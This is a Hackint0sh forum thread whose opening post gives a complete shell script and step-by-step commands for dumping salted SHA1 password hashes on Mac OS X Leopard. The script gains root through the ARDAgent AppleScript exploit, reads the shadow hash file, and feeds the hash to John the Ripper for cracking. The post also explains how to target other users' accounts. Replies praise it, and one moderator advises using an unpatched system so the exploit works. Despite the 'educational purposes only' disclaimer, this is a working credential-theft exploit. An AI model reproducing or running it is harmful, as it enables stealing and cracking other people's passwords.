Results 1 to 7 of 7
Discuss [Security] Dumping and Bruteforcing Password Hashes on Leopard at the OSX Security - Hackint0sh.org; From a anonymous contributor, this interesting article: Dumping and Bruteforcing Password Hashes on Leopard ============================================= ...
  1. #1
    sam
    sam is offline
    Chief of Administration
    iPhone Dev Team
    Array sam's Avatar

    Join Date
    Jun 2007
    Posts
    1,852
    Post Thanks / Like
    Downloads
    35
    Uploads
    277
    Rep Power
    10

    Default [Security] Dumping and Bruteforcing Password Hashes on Leopard

    From a anonymous contributor, this interesting article:

    Dumping and Bruteforcing Password Hashes on Leopard

    =============================================
    ====This is for educational purposes only, do not use maliciously====
    =============================================

    Like on Tiger, salted SHA1 hashes of the password can be dumped. But there is one catch: the user must have root. This can be done by using the newly found ARDAgent exploit. Attached to this post is a .sh script archived in a zip file. This script WILL NOT work if the ARDAgent exploit has been fixed on the target computer. To run the script, do the following in Terminal (/Applications/Utilities):

    cd /path/to/the/folder/containing/the/script/
    chmod +x passdump.sh
    ./passdump.sh

    From there, you will see a lot of information, and then a file (named theUserName.hash.txt) will be written to your desktop containing the username of the password that is dumped and the salted SHA1 hash contained with this username. This txt file can be run through a bruteforce application named John the Ripper (http://www.openwall.com/john/). A modified build is needed for detecting this hash correctly. This build is found here:

    ftp://ftp.openwall.com/pub/projects/...7.2-macosx.zip

    Once you download this, just unzip it, and do the following in Terminal:

    cd <Drag the unzipped folder into the window>
    cd run
    ./john --format=salt-sha1 ~/Desktop/theUserName.hash.txt

    From there, John the Ripper will bruteforce the password. The time for it to get the password will spend on the size and security of the password. Make sure you replace theUserName in the Terminal commands with the one of the file on your desktop. John should say:
    Loaded 1 password hash (Salt SHA1 [salt-sha1])

    Once John has gotten your password, it will display it as follows:
    thePassword (theUserName)


    One thing to note: If you want to dump the password of a user that is not the current user, then change this line in the passdump.sh:

    CURRENTUSER=`whoami`

    to:

    CURRENTUSER="theUserNameToDump"


    Remember, this is for educational purposes only, do not use it maliciously.

    Here is the script, just put it into a file named passdump.sh:

    Code:
    #!/bin/sh
    
    echo "\nWelcome."
    echo "====================================================================="
    echo "====This is for educational purposes only, do not use maliciously===="
    echo "====================================================================="
    sleep 2
    echo "For this to work correctly, the ARDAgent exploit must be enabled."
    echo " "
    echo "Testing to see if the exploit is enabled..."
    echo " "
    
    EXPUSER=`osascript -e 'tell application "ARDAgent" to do shell script "whoami"' 2> /dev/null`
    
    if [ "$EXPUSER" = "root" ]; then
    echo "The exploit is enabled, continuing..\n"
    
    CURRENTUSER=`whoami`
    
    if [ "$CURRENTUSER" = "root" ]; then
    echo "Getting password for user 'root' is not allowed."
    echo "Please run this without being root."
    exit 0
    fi
    
    echo "Getting password for the user $CURRENTUSER\n"
    
    USERUID=`dscl localhost -read /Search/Users/$CURRENTUSER | grep GeneratedUID | sed s/GeneratedUID:\ //`
    
    echo "The UID of $CURRENTUSER is $USERUID"
    
    SALTEDSHA=`sh -c "osascript -e 'tell application \"ARDAgent\" to do shell script \"cat /var/db/shadow/hash/$USERUID | cut -c169-216\"'" 2> /dev/null` 
    
    echo "The salted SHA1 hash is $SALTEDSHA\n"
    echo "$CURRENTUSER:$SALTEDSHA" > ~/Desktop/$CURRENTUSER.hash.txt
    echo "The password was written to ~/Desktop/$CURRENTUSER.hash.txt, which can be run through a modified John the Ripper, found here:"
    echo "ftp://ftp.openwall.com/pub/projects/john/contrib/osx/john-1.7.2-macosx.zip"
    
    else
    echo "The ARDAgent exploit is not enabled, so therefore, this will not work."
    exit 0
    fi
    Last edited by sam; 07-09-2008 at 02:10 AM.
    If you just want to support hackint0sh.org with a donation click here.
    Follow me on twitter: http://twitter.com/sam_hackint0sh



  2. #2
    Newbie Array

    Join Date
    Jul 2008
    Posts
    1
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    0

    Default

    Interesting…props to whoever made this.
    Last edited by pater; 07-09-2008 at 02:32 AM.

  3. #3
    Professional Array

    Join Date
    May 2008
    Posts
    59
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    8

    Default

    Interesting…props to whoever made this.

  4. #4
    Newbie Array

    Join Date
    Aug 2008
    Posts
    4
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    0

    Default

    great post!!! more security threads!!!!

  5. #5
    Newbie Array

    Join Date
    May 2011
    Posts
    1
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    0

    Default ARDAgent exploit?

    I'm basically following a tutorial to see if it can be done.

    But in order to do it I need to have the ARDAgent exploit enabled. How do I do that? How can I enable it?

    Thanks for the quick answer.

    -OneProto
    Last edited by Olethros; 05-25-2011 at 07:48 AM.


  6. #6
    Super Moderator Array Olethros's Avatar

    Join Date
    Sep 2007
    Location
    Norway
    Posts
    8,360
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    439

    Default

    Quote Originally Posted by OneProto View Post
    I'm basically following a tutorial to see if it can be done.

    But in order to do it I need to have the ARDAgent exploit enabled. How do I do that? How can I enable it?

    Thanks for the quick answer.

    -OneProto
    If you read the first post again, you will see that they mean you have to find a version of Leopard where a security fix (or 10.5.x update) hasn't yet been applied to close this exploit.
    In other words, try with a vanilla unpatched 10.5 (or go and search for which apple update first closed this bug. Then update your vanilla 10.5 install to include all updates that were released prior to the bug fixing update)
    Please read the stickies & search forum before posting!
    How to report an iTunes restore/update fail in a useful manner
    -

    iPad 3G 64GB (4.3.3, Redsn0w) oldest SHSH 3.2.2
    iPhone 4 32GB (4.2.1, Redsn0w JB-monte) oldest SHSH 4.1
    iPhone 3GS 32GB (4.3.3; Pwnagetool) factory unlocked oldest SHSH 3.1
    iPhone 8GB (3.1.3; Pwnagetool) AT&T Locked - Unlocked with bootneuter

    -
    Did we solve your problem? Got a dollar or two spare ? Donate!

  7. #7
    Newbie Array

    Join Date
    Mar 2014
    Posts
    7
    Post Thanks / Like
    Downloads
    0
    Uploads
    0
    Rep Power
    0

    Default

    Hai, Useful post. Thanks.

 

 

Similar Threads

  1. MacNN: Apple boosts firmware password security on newer Macs
    By hackint0sh in forum Latest Headlines
    Replies: 0
    Last Post: 03-10-2011, 06:50 PM
  2. Replies: 0
    Last Post: 10-21-2010, 04:20 PM
  3. 3.0 GM md5 hashes
    By Gi0 in forum iOS 3.x (iPhone OS 3.x)
    Replies: 11
    Last Post: 06-17-2009, 10:33 PM
  4. Replies: 0
    Last Post: 12-31-2007, 12:51 AM
  5. Bruteforcing NCK
    By amasiancrasian in forum General
    Replies: 2
    Last Post: 07-28-2007, 08:21 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Powered by vBulletin®
Copyright © 2014 vBulletin Solutions, Inc. All rights reserved.
Search Engine Friendly URLs by vBSEO
(c) 2006-2012 Hackint0sh.org
All times are GMT +2. The time now is 04:10 AM.
twitter, follow us!